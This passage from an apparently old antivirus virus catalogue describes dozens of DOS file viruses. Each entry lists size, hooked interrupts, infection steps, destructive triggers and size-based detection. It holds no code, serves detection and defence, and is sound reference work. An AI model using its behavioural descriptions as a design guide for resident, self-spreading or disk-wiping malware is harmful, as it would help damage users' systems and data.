  3476. Virus Length:  552 Bytes (EXE)
  3477. PC Vectors Hooked: INT 21h
  3478.  
  3479. Infection Procedure:
  3480. 1) The virus checks whether it is already loaded resident into memory.
  3481.     If "No", it then loads itself into memory  (highest memory) by
  3482.     hooking INT 21h.
  3483. 2) It then executes the original file.
  3484. 3) It infects when the command  "DEGUG FILE_NAME.EXE" is executed.
  3485.     b) Doesn't infect .COM files.
  3486.  
  3487. Damage:  None
  3488.  
  3489. Detection method: Infected .EXE files increase by 552 Bytes.
  3490.  
  3491. Note:
  3492. The  AIDS552 virus doesn't hook INT 24h when infecting files.  An
  3493. error message appears if there is an I/O error (such as write
  3494. protect).
  3495.  
  3496. [408]
  3497. Virus Name: 408
  3498. Virus Type: Memory Resident, File Virus (infects .COM files).
  3499. Virus Length:  408 Bytes (COM)
  3500. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3501.  
  3502. Infection Procedure:
  3503. 1) The virus checks whether it is already loaded resident in memory.
  3504.     If "No", it then loads itself resident into memory by hooking INT
  3505.     21h.
  3506. 2) It then executes the original file.
  3507. 3) With itself loaded resident into memory it will infect any
  3508.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3509.  
  3510. Detection method: Infected files increase by 408 Bytes.
  3511.  
  3512. Note:
  3513. The 408 virus doesn't hook INT 24h when infecting files. An error
  3514. message appears if there is an I/O error (such as write protect).
  3515.  
  3516. [BOOJUM]
  3517. Virus Name: BOOJUM
  3518. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  3519. Virus Length:  340 Bytes (EXE)
  3520. PC Vectors Hooked: INT 21h
  3521.  
  3522. Infection Procedure:
  3523. 1)  The virus checks whether it is already loaded resident in memory.
  3524.      If "No", it then loads itself into memory (highest memory) by
  3525.      hooking INT 21h.
  3526. 2) It then executes the original file.
  3527. 3) With itself loaded into memory it will infect any uninfected file
  3528.     that is executed. b) It doesn't infect .COM files.
  3529.  
  3530. Damage:  None
  3531.  
  3532. Detection method: Infected EXE files increase by 340 Bytes.
  3533.  
  3534. Note:
  3535. The BOOJUM virus doesn't hook INT 24h when infecting files. An
  3536. error message appears if there is an I/O error (such as write protect).
  3537.  
  3538. [Shirley]
  3539. Virus Name: SHIRLEY
  3540. Virus Type: Memory Resident, File Virus (infects .EXE files).
  3541. Virus Length:  4110 Bytes (EXE)
  3542. PC Vectors Hooked: INT 21h
  3543.  
  3544. Infection Procedure:
  3545. 1) The virus checks whether it is already loaded resident in memory.
  3546.     If "No", it then loads itself resident into memory (highest
  3547.     memory) by hooking INT 21h.
  3548. 2) It then executes the original file.
  3549. 3) With itself loaded resident into memory it will infect any
  3550.     uninfected file that is executed. b) It doesn't infect .COM files.
  3551.  
  3552. Damage:  None
  3553.  
  3554. Detection method: Infected EXE files increase by 4110 bytes.
  3555.  
  3556. Note:
  3557. The Shirley virus doesn't hook INT 24h when infecting files. An error
  3558. message appears if there is an I/O error (such as write protect).
  3559.  
  3560. [D-Tiny]
  3561. Virus Name: D-TINY
  3562. Virus Type: Memory Resident, File Virus (infects .COM files).
  3563. Virus Length:  126 Bytes (COM)
  3564. PC Vectors Hooked: INT 21h
  3565.  
  3566. Infection Procedure:
  3567. 1)  The virus checks whether it is already loaded resident in memory.
  3568.      If "No", it then loads itself resident into memory by hooking INT
  3569.      21h.
  3570. 2) It then executes the original file.
  3571. 3) With itself loaded resident into memory it will infect any
  3572.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3573.  
  3574. Damage:  None
  3575.  
  3576. Detection method: Infected COM files increase by 126 Bytes.
  3577.  
  3578. Note:
  3579. D-TINY doesn't hook INT 24h when infecting files. An error message
  3580. appears if there is an I/O error (such as write protect).
  3581.  
  3582. [01-07]
  3583. Virus Name: 01-07
  3584. Virus Type: Memory Resident, File Virus (infects .COM files)
  3585. Virus Length:  639 Bytes (COM)
  3586. PC Vectors Hooked: INT 21h
  3587.  
  3588. Infection Procedure:
  3589. 1) The virus checks whether the system date is between the 1st and
  3590.     the 6th of January.  If "Yes",  it shows the message:" Happy
  3591.     New Year " on the screen and the system halts.  If "No", the
  3592.     virus checks whether it is   already loaded resident in memory.
  3593.     If "No", it then loads itself resident into memory by hooking
  3594.     INT 21h.
  3595. 2) It then executes the original file.
  3596. 3) With itself loaded resident into memory it will infect any
  3597.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3598.  
  3599. Damage: System halts when the system date is between the 1st and 6th
  3600. of January.
  3601.  
  3602. Detection method: Infected files increase by 639 Bytes.
  3603.  
  3604. Note:
  3605. The 01-07 virus doesn't hook INT 24h when infecting files.  An error
  3606. message appears if there is an I/O error (such as write protect).
  3607.  
  3608. [Bit_Addict]
  3609. Virus Name: BIT_ADDICT
  3610. Virus Type: Memory Resident, File Virus (infects .COM files)
  3611. Virus Length:  477 Bytes (COM)
  3612. PC Vectors Hooked: INT 21h
  3613.  
  3614. Infection Procedure:
  3615. 1)  The virus checks whether it is already loaded resident in memory.
  3616.      If "No", it then loads itself resident into memory by hooking INT
  3617.      21h.
  3618. 2) It then executes the original file.
  3619. 3) With itself loaded resident into memory it will infect any
  3620.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3621.  
  3622. Damage: When the virus has already infected 100 files, it will
  3623. destroy all data on the hard disk, then show the message: "BIT
  3624. ADDICTMZ> .... The Bit Addict says: You have a good tasting hard disk,
  3625. it was delicious !!!"
  3626.  
  3627. Detection method: Infected files increase by 477 Bytes.
  3628.  
  3629. Note:
  3630. The BIT_ADDICT virus doesn't hook INT 24h when infecting files.
  3631. An error message appears if there is an I/O error (such as write
  3632. protect).
  3633.  
  3634. [CSL-2]
  3635. Virus Name: CSL-2
  3636. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  3637. Virus Length:  709 Bytes (COM)
  3638. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3639.  
  3640. Infection Procedure:
  3641. 1)  The virus checks whether it is already loaded resident in memory.
  3642.      If "No", it then loads itself resident into memory by hooking INT
  3643.      21h.
  3644. 2) It then executes the original file.
  3645. 3) With itself loaded resident into memory it will infect any
  3646.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3647.  
  3648. Damage:   None
  3649.  
  3650. Detection method: Infected files increase by 709 Bytes.
  3651.  
  3652. Note:
  3653. The CSL-2 virus doesn't hook INT 24h when infecting files. An error
  3654. message appears if there is an I/O error (such as write protect).
  3655.  
  3656. [Highland]
  3657. Virus Name: HIGHLAND
  3658. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3659. Virus Length:  477 Bytes (COM)
  3660. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3661.  
  3662. Infection Procedure:
  3663. 1)  The virus checks whether it is already loaded resident in memory.
  3664.      If "No", it then loads itself resident into memory by hooking INT
  3665.      21h.
  3666. 2) It then executes the original file.
  3667. 3) With itself loaded resident into memory it will infect any
  3668.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3669.  
  3670. Damage: When the system date is the 29th, all files infected by
  3671. Highland can't be executed.
  3672.  
  3673. Detection method: Infected files increase by 477 Bytes.
  3674.  
  3675. Note: Highland doesn't hook INT 24h when infecting files.  An error
  3676. message appears if there is an I/O error (such as write protect).
  3677.  
  3678. [CMDR]
  3679. Virus Name: CMDR
  3680. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3681. Virus Length:  4096 Bytes (COM)
  3682. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3683.  
  3684. Infection Procedure:
  3685. 1) The virus checks whether it is already loaded resident in memory.
  3686.     If "No", it then loads itself resident into memory by hooking INT
  3687.     21h.
  3688. 2) It then executes the original file.
  3689. 3) With itself loaded resident into memory it will infect any
  3690.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3691.  
  3692. Damage:   None
  3693.  
  3694. Detection method: Infected files increase by 4096 Bytes.
  3695.  
  3696. Note:
  3697. The CMDR virus doesn't hook INT 24h when infecting files. An error
  3698. message appears if there is an I/O error (such as write protect).
  3699.  
  3700. [POX]
  3701. Virus Name: POX
  3702. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  3703. Virus Length:  609 Bytes (COM)
  3704. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 9h
  3705.  
  3706. Infection Procedure:
  3707. 1) The virus checks whether it is already loaded resident in memory.
  3708.     If "No", it then loads itself resident into memory (highest memory)
  3709.     by hooking INT  21h.
  3710. 2) It then executes the original file.
  3711. 3) With itself loaded resident into memory it will infect any
  3712.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3713.  
  3714. Damage: POX hooks INT 9h, when the <Delete> key is pressed. The virus
  3715. will check the system date; if DAY=24, it will format the hard disk.
  3716.  
  3717. Detection method: Infected files increase by 609 Bytes.
  3718.  
  3719. Note:
  3720. The POX virus doesn't hook INT 24h when infecting files.  An error
  3721. message appears if there is an I/O error (such as write protect).
  3722.  
  3723. [SBC-1]
  3724. Virus Name: SBC-1
  3725. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  3726. Virus Length:  No change
  3727. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3728.  
  3729. Infection Procedure:
  3730. 1) The virus checks whether it is already loaded resident in memory.
  3731.     If "No", it then loads itself resident into memory (highest
  3732.     memory) by hooking INT 21h.
  3733. 2) It then checks whether the "COMMAND.COM" file has been infected;
  3734.     if "No", then it infects the file.
  3735. 3) It then executes the original file.
  3736. 4) With itself loaded resident into memory it will infect any
  3737.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3738.  
  3739. Damage: Overwrites the original file, so the length of infected files
  3740. won't increase.
  3741.  
  3742. Detection method:  None
  3743.  
  3744. Note: The SBC-1 doesn't hook INT 24h when infecting files.  An error
  3745. message appears if there is an I/O error (such as write protect).
  3746.  
  3747. [Nov_17-1]
  3748. Virus Name: NOV_17-1
  3749. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3750. Virus Length:  768 Bytes (COM and EXE)
  3751. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3752.  
  3753. Infection Procedure:
  3754. 1) This virus checks whether it is already loaded resident in memory.
  3755.     If "No", it then loads itself resident into memory by hooking INT
  3756.     21h.
  3757. 2) It then executes the original file.
  3758. 3) With itself loaded resident into memory it will infect any
  3759.     uninfected file that is executed.
  3760.  
  3761. Damage:   None
  3762.  
  3763. Detection method: Infected files increase by 768 Bytes.
  3764.  
  3765. Note: The NOV_17-1 virus doesn't hook INT 24h when infecting files.
  3766. An error message appears if there is an I/O error (such as write
  3767. protect).
  3768.  
  3769. [HBT]
  3770. Virus Name: HBT
  3771. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  3772. Virus Length:  394 Bytes (COM and EXE)
  3773. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3774.  
  3775. Infection Procedure:
  3776. 1) The virus checks whether it is already loaded resident in memory.
  3777.     If "No", it then loads itself resident into memory by hooking INT
  3778.     21h.
  3779. 2) It then executes the original file.
  3780. 3) With itself loaded resident into memory it will infect any
  3781.     uninfected file that is executed.
  3782.  
  3783. Damage: When the virus is resident in memory, a file can't be
  3784. executed, but only infected.
  3785.  
  3786. Detection method: Infected files increase by 394 Bytes.
  3787.  
  3788. Note:
  3789. The  HBT virus doesn't hook INT 24h when infecting files.  An error
  3790. message appears if there is an I/O error (such as write protect).
  3791.  
  3792. [Gotcha]
  3793. Virus Name: GOTCHA
  3794. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3795. Virus Length:  906 Bytes (COM and EXE)
  3796. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3797.  
  3798. Infection Procedure:
  3799. 1) The virus checks whether it is already loaded resident in memory.
  3800.     If "No", it then loads itself resident into memory (highest
  3801.     memory) by hooking INT 21h.
  3802. 2) It then executes the original file.
  3803. 3) With itself loaded resident into memory it will infect any
  3804.     uninfected file that is executed.
  3805. 4) It also infects when a file is renamed, file attributes are set,
  3806.     search for a matching file or deleting a file.
  3807.  
  3808. Damage:   None
  3809.  
  3810. Detection method: Infected files increase by 906 Bytes.
  3811.  
  3812. Note: The Gotcha virus hooks INT 24h when infecting files. Omits I/O
  3813. error (such as write protect).
  3814.  
  3815. [Voronezh-2]
  3816. Virus Name: VORONEZH-2
  3817. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3818. Virus Length:  1600 Bytes (COM and EXE)
  3819. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3820.  
  3821. Infection Procedure:
  3822. 1) The virus checks whether it is already loaded resident in memory.
  3823.     If "No", it then loads itself resident into memory by hooking
  3824.     INT 21h.
  3825. 2) It then executes the original file.
  3826. 3) With itself loaded resident into memory it will infect any
  3827.     uninfected file that is executed.
  3828.  
  3829. Damage:   None
  3830.  
  3831. Detection method: Infected files increase by 1600 Bytes.
  3832.  
  3833. Note:
  3834. The Voronezh-2 virus  hooks INT 24h when infecting files. It omits
  3835. I/O errors (such as write protect).
  3836.  
  3837. [Amilia]
  3838. Virus Name: AMILIA
  3839. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  3840. Virus Length:  1614 Bytes (COM and EXE)
  3841. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3842.  
  3843. Infection Procedure:
  3844. 1) The virus checks whether it is already loaded resident in memory.
  3845.     If "No", it then loads itself resident into memory by hooking
  3846.     INT 21h.
  3847. 2) It then executes the original file.
  3848. 3) With itself loaded resident into memory it will infect any
  3849.     uninfected file that is executed.
  3850.  
  3851. Damage:
  3852. 1) If it is Sunday, a message is displayed on the screen: "Amilia I
  3853.     virii - [NUKE]  1991 By Rock Steady/NUKE," then the system halts.
  3854. 2) If it is between 4 and 5 o'clock in the afternoon, a smiling face
  3855.     appears on the screen.
  3856.  
  3857. Detection method:
  3858. 1) Infected files increase by 1614 Bytes.
  3859. 2) A smiling face appears on the screen.
  3860.  
  3861. Note:
  3862. The Amilia virus hooks INT 24h when infecting files. It omits I/O
  3863. errors (such as write protect).
  3864.  
  3865. [981]
  3866. Virus Name: 981
  3867. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3868. Virus Length: 981 Bytes (COM), about 1010 Bytes (EXE)
  3869. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3870.  
  3871. Infection Procedure:
  3872. 1) The virus checks the DOS version; if the DOS version is earlier than
  3873.     3.0 it will show the message: " This program requires MS-DOS 3.0 or
  3874.     later."
  3875. 2) The virus checks whether it is already loaded resident in memory.
  3876.     If "No", it then loads itself resident into memory (highest memory)
  3877.     by hooking INT 21h.
  3878. 2) It then executes the original file.
  3879. 3) With itself loaded resident into  memory it will infect any
  3880.     uninfected file that is executed.
  3881.  
  3882. Damage:   None
  3883.  
  3884. Detection method: Infected .COM files increase by 981 Bytes, .EXE
  3885. files increase by 1010 Bytes.
  3886.  
  3887. Note: The 981 virus hooks INT 24h when infecting files. It omits I/O
  3888. errors (such as write protect).
  3889.  
  3890. [Gotcha-2]
  3891. Virus Name: GOTCHA-2
  3892. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3893. Virus Length:  627 Bytes (COM), 527 Bytes (EXE)
  3894. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3895.  
  3896. Infection Procedure:
  3897. 1) The virus checks whether it is already loaded resident in memory.
  3898.     If "No", it then loads itself resident into memory by hooking INT
  3899.     21h.
  3900. 2) It then executes the original file.
  3901. 3) With itself loaded resident into memory it will infect any
  3902.     uninfected file that is executed. a) Before it infects a file,
  3903.     it will check the file name.
  3904.  
  3905. Damage:   None
  3906.  
  3907. Detection method: Infected .COM files increase by 627 Bytes and .EXE
  3908. files increase by 527  Bytes.
  3909.  
  3910. Note:
  3911. The Gotcha-2 virus hooks INT 24h and closes the "control_break"
  3912. function when infecting files. It omits I/O errors (such as write
  3913. protect).
  3914.  
  3915. [Hungarian]
  3916. Virus Name: HUNGARIAN
  3917. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3918. Virus Length:  749 Bytes (COM and EXE)
  3919. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  3920.                           INT 8h
  3921.  
  3922. Infection Procedure:
  3923. 1)  The virus checks whether it is already loaded resident in memory.
  3924.      If "No", it then loads itself resident into memory (highest
  3925.      memory) by hooking INT 21h.
  3926. 2) If (Year=1990 and month >=6) then it will hook INT 8h.
  3927. 3) It then executes the original file.
  3928. 4) With itself loaded resident into memory it will infect any
  3929.     uninfected file that is executed.
  3930.  
  3931. Damage: When Hungarian hooks INT 8h, it will set the Counter to 0xFFFF.
  3932. Each time when INT 8h  is called, the counter  will decrease by one.
  3933. When the  counter equals zero (about one hour), it will begin to
  3934. destroy files. Whenever you run any file, it will be destroyed.
  3935.  
  3936. Detection method:  Infected files increase by 749 Bytes.
  3937.  
  3938. Note:  The Hungarian virus hooks INT 24h when infecting  files.
  3939. It omits I/O errors (such as write protect).
  3940.  
  3941. [CK]
  3942. Virus Name: CK
  3943. Virus Type:  Memory Resident, File Virus (infects .COM  and .EXE files)
  3944. Virus Length:  1163 Bytes (COM and EXE)
  3945. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  3946.                           INT 13h
  3947.  
  3948. Infection Procedure:
  3949. 1) The virus checks whether it is already loaded resident in memory.
  3950.     If "No", it then loads itself resident into memory by hooking
  3951.     INT 21h.
  3952. 2) It then executes the original file.
  3953. 3) With itself loaded resident into memory it will infect any
  3954.     uninfected file that is executed.
  3955.  
  3956. Damage: The virus hooks INT 13h; some time later, the system will
  3957. produce sounds.
  3958.  
  3959. Detection method: Infected files increase by 1163 Bytes.
  3960.  
  3961. Note:  The CK virus hooks INT 24h when infecting files. It omits
  3962. I/O errors (such as write protect).
  3963.  
  3964. [2136]
  3965. Virus Name: 2136
  3966. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  3967. Virus Length:  2136 Bytes (COM and EXE)
  3968. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3969.  
  3970. Infection Procedure:
  3971. 1) The virus checks whether it is already loaded resident in memory.
  3972.     If "No", it then loads itself resident into memory by hooking INT
  3973.     21h.
  3974. 2) It then executes the original file.
  3975. 3) With itself loaded resident into memory it will infect any
  3976.     uninfected file that is executed.
  3977.  
  3978. Damage: None
  3979.  
  3980. Detection method: Infected files increase by 2136 Bytes.
  3981.  
  3982. Note: The 2136 virus hooks INT 24h when infecting files. It omits
  3983. I/O errors (such as write protect).
  3984.  
  3985. [Casteggi]
  3986. Virus Name: CASTEGGI
  3987. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  3988. Virus Length:  2881 Bytes (COM and EXE)
  3989. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  3990.                           INT 1Ch
  3991.  
  3992. Infection Procedure:
  3993. 1) The virus checks whether it is already loaded resident in memory.
  3994.     If "No", it then loads itself resident into memory by hooking INT
  3995.     21h.
  3996. 2) It then executes the original file.
  3997. 3) With itself loaded resident into memory it will infect any
  3998.     uninfected file that is executed.
  3999.  
  4000. Damage: When DAY>10, the virus will count time by hooking INT 1Ch.
  4001. About 6 minutes later, the screen image will be destroyed.
  4002.  
  4003. Detection method: Infected files increase by 2881 Bytes.
  4004.  
  4005. Note: The Casteggi virus hooks INT 24h when infecting files. It
  4006. omits I/O errors (such as write protect).
  4007.  
  4008. [Enola]
  4009. Virus Name: ENOLA
  4010. Virus Type:  Memory Resident, File Virus (infects .COM and .EXE files)
  4011. Virus Length:  1865--1875 Bytes (COM and EXE)
  4012. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4013.                           INT 8h
  4014.  
  4015. Infection Procedure:
  4016. 1) The virus checks whether it is already loaded resident in memory.
  4017.     If "No", it then loads itself resident into memory by hooking INT
  4018.     21h.
  4019. 2) It then executes the original file.
  4020. 3) With itself loaded resident into memory it will infect any
  4021.     uninfected file that is executed.
  4022.  
  4023. Damage: When the virus has stayed resident for 140 minutes and INT
  4024. 21h has been called for more than 72 times, all data on the hard
  4025. disk will be destroyed.
  4026.  
  4027. Detection method: Infected files increase by 1865-1875 Bytes.
  4028.  
  4029. Note: The Enola virus hooks INT 24h when infecting files. It omits
  4030. I/O errors (such as write protect).
  4031.  
  4032. [Ontari03]
  4033. Virus Name: ONTARI03
  4034. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  4035. Virus Length:  2048 Bytes (COM and EXE)
  4036. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4037.  
  4038. Infection Procedure:
  4039. 1) The virus checks whether it is already loaded resident in memory.
  4040.     If "No", it then loads itself resident into memory by hooking
  4041.     INT 21h.
  4042. 2) It then executes the original file.
  4043. 3) With itself loaded in memory it will infect any uninfected file
  4044.     that is executed.
  4045.  
  4046. Damage: None
  4047.  
  4048. Detection method: Infected files increase by 2048 Bytes.
  4049.  
  4050. Note: The Ontari03 virus hooks INT 24h when infecting files. It omits
  4051. I/O errors (such as write protect).
  4052.  
  4053. [PCBB-B]
  4054. Virus Name: PCBB-B
  4055. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  4056. Virus Length:  3072 Bytes (COM and EXE)
  4057. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4058.  
  4059. Infection Procedure:
  4060. 1) The virus checks whether it is already loaded resident in memory.
  4061.     If "No", it then loads itself resident into memory (highest
  4062.     memory) by hooking INT 21h.
  4063. 2) It then executes the original file.
  4064. 3) With itself loaded resident into memory it will infect any
  4065.     uninfected file that is executed.
  4066.  
  4067. Damage: None
  4068.  
  4069. Detection method: Infected files increase by 3072 Bytes.
  4070.  
  4071. Note: The PCBB virus hooks INT 24h when infecting files. It omits
  4072. I/O errors (such as write protect).
  4073.  
  4074. [Canna615]
  4075. Virus Name: CANNA615
  4076. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  4077. Virus Length:  1568 Bytes (COM and EXE)
  4078. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4079.  
  4080. Infection Procedure:
  4081. 1) The virus checks whether it is already loaded resident in memory.
  4082.     If "No", it then loads itself resident into memory by hooking INT
  4083.     21h.
  4084. 2) It then checks whether the system date is Friday, and Seconds is
  4085.     zero; if "Yes", then a message and a picture appear on the
  4086.     screen: "LEGALIZE CANNA615" and a picture of a hemp leaf.
  4087. 3) It then executes the original file.
  4088. 4) With itself loaded resident into memory it will infect any
  4089.     uninfected file that is executed.
  4090.  
  4091. Damage:   None
  4092.  
  4093. Detection method:  Infected files increase by 1568 Bytes.
  4094.  
  4095. Note: The Canna615 virus hooks INT 24h when infecting files. It
  4096. omits I/O error (such as write protect).
  4097.  
  4098. [Magnum]
  4099. Virus Name: MAGNUM
  4100. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4101. Virus Length:  2560 Bytes (COM and EXE)
  4102. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4103.                           INT 8h
  4104.  
  4105. Infection Procedure:
  4106. 1) The virus checks whether it is already loaded resident in memory.
  4107.     If "No", it then loads itself resident into memory by hooking INT
  4108.     21h.
  4109. 2) It then executes the original file.
  4110. 3) With itself loaded resident into memory it will infect any
  4111.     uninfected file that is executed.
  4112.  
  4113. Damage:   None
  4114.  
  4115. Detection method: Infected files increase by 2560 Bytes.
  4116.  
  4117. Note:
  4118. 1) The Magnum virus hooks INT 24h when infecting files. It omits
  4119.     I/O errors (such as write protect).
  4120. 2) The virus only runs under DOS 3.3.
  4121.  
  4122. [Lycee]
  4123. Virus Name: LYCEE
  4124. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4125. Virus Length:  1788 Bytes (COM and EXE)
  4126. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4127.                           INT 8h, INT 9h
  4128.  
  4129. Execution Procedure:
  4130. 1) Checks whether it resides in memory.  If not, hooks INT 21h, INT 8h
  4131.     and INT 9h, installs itself as memory resident, and then executes
  4132.     the host program.
  4133. 2) If the virus already resides in memory, it will proceed to execute
  4134.     the host program directly.
  4135.  
  4136. Infection Procedure:
  4137. 1) The virus Infects files by AH=4B in INT 21h. When an uninfected
  4138.     program is executed, it will get infected.
  4139. 2) Lycee will hook INT 24h before infecting files to ignore I/O errors.
  4140.  
  4141. Damage: If you haven't pressed any keys for a while (i.e., few minutes),
  4142. a small window will appear on the screen until you press a key.
  4143.  
  4144. Detection method: Infected files increase by 1788 Bytes.
  4145.  
  4146. Note: The Lycee virus hooks INT 24h when infecting files. It omits
  4147. I/O errors (such as write protect).
  4148.  
  4149. Remarks: The virus does timing by INT 8h.  When the keyboard is not
  4150. hit for a certain period of time, the virus will open a small window
  4151. on the screen until a key is pressed.
  4152.  
  4153. [Brain2]
  4154. Virus Name: BRAIN2
  4155. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4156. Virus Length:  1935 Bytes (COM and EXE)
  4157. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4158.                           INT 1Ch
  4159.  
  4160. Infection Procedure:
  4161. 1) It checks whether the system date is the 17th of November or the
  4162.     6th of February; if "Yes", it will display some messages and play
  4163.     music.
  4164. 2) The virus then checks whether it  is already loaded resident in
  4165.     memory. If "No", it then loads itself resident into memory by
  4166.     hooking INT 21h.
  4167. 3) It then executes the original file.
  4168. 4) It then checks whether the system date is the 1st of  February,
  4169.     July, September or December; if "yes", the virus will show a
  4170.     flash square by hooking INT 1Ch.
  4171. 5) With itself loaded resident into memory it will infect any
  4172.     uninfected file that is executed.
  4173.  
  4174. Damage: None
  4175.  
  4176. Detection method: Infected files increase by 1935 Bytes.
  4177.  
  4178. Note: The Brain2 virus hooks INT 24h when infecting files. It omits
  4179. I/O errors (such as write protect).
  4180.  
  4181. [Antiprnt]
  4182. Virus Name: ANTIPRNT
  4183. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  4184. Virus Length:  593 Bytes (EXE)
  4185. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4186.  
  4187. Infection Procedure:
  4188. 1) The virus checks whether it is already loaded resident in memory.
  4189.     If "No", it then loads itself resident into memory (highest
  4190.     memory) by hooking INT 21h.
  4191. 2) It then executes the original  file.
  4192. 3) With itself loaded resident into memory it will infect any
  4193.     uninfected file that is executed.
  4194.  
  4195. Damage: If the DOS Version is later than 3.0, and "PRINTER" is
  4196. installed, then the virus will destroy data on the current disk.
  4197.  
  4198. Detection method: Infected files increase by 593 Bytes.
  4199.  
  4200. Note: The ANTIPRNT virus hooks INT 24h when infecting files. It omits
  4201. I/O errors (such as write protect).
  4202.  
  4203. [ABC]
  4204. Virus Name: ABC
  4205. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  4206. Virus Length:  2912 Bytes (EXE)
  4207. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4208.                           INT 1Ch, INT 16h
  4209.  
  4210. Infection Procedure:
  4211. 1) The virus checks whether it is already loaded resident in memory.
  4212.     If "No", it then loads itself resident in memory (highest memory)
  4213.     by hooking INT 21h, INT 1Ch, INT 16h.
  4214. 2) It then executes the original file.
  4215. 3) With itself loaded resident into memory it will infect any
  4216.     uninfected file that is executed. b) Doesn't infect COM files
  4217.     and EXE files smaller than 20KB.
  4218.  
  4219. Damage: When the system date is the 14th, and the virus has been in
  4220. the memory for 55 minutes, the virus will destroy data on the hard
  4221. disk.
  4222.  
  4223. Detection method: Infected files increase by 2912 Bytes.
  4224.  
  4225. Note: The ABC virus hooks INT 24h when infecting files. It omits
  4226. I/O errors (such as write protect).
  4227.  
  4228. [CivilWar]
  4229. Virus Name: Civilwar
  4230. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4231. Virus Length:  599 Bytes (COM)
  4232. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4233.  
  4234. Execution Procedure:
  4235. 1) The virus checks whether it is already loaded resident in memory.
  4236.     If "No", it then loads itself resident into memory (highest memory)
  4237.     by hooking INT 21h.
  4238. 2) It then executes the original file.
  4239. 3) With itself loaded resident into memory it will infect any
  4240.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4241.  
  4242. Damage: None
  4243.  
  4244. Detection method: Infected files increase by 599 Bytes.
  4245.  
  4246. Note: The Civilwar virus  hooks INT 24h when infecting files. It
  4247. omits I/O errors (such as write protect).
  4248.  
  4249. [Leech]
  4250. Virus Name: Leech
  4251. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4252. Virus Length:  1024 Bytes (COM)
  4253. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4254.  
  4255. Execution Procedure:
  4256. 1) The virus checks whether it is already loaded resident in memory.
  4257.     If "No", it then loads itself resident into memory by hooking INT
  4258.     21h.
  4259. 2) It then executes the original file.
  4260. 3) With itself loaded resident into memory it will infect any
  4261.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4262.  
  4263. Damage: None
  4264.  
  4265. Detection method: Infected files increase by 1024 Bytes.
  4266.  
  4267. Note: The Leech virus hooks INT 24h when infecting files. It omits
  4268. I/O errors (such as write protect).
  4269.  
  4270. [302]
  4271. Virus Name: 302
  4272. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4273. Virus Length:  302 Bytes (COM)
  4274. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4275.  
  4276. Execution Procedure:
  4277. 1) The virus checks whether it is already loaded resident in memory.
  4278.     If "No", it then loads itself resident into memory by hooking INT
  4279.     21h.
  4280. 2) It then executes the original file.
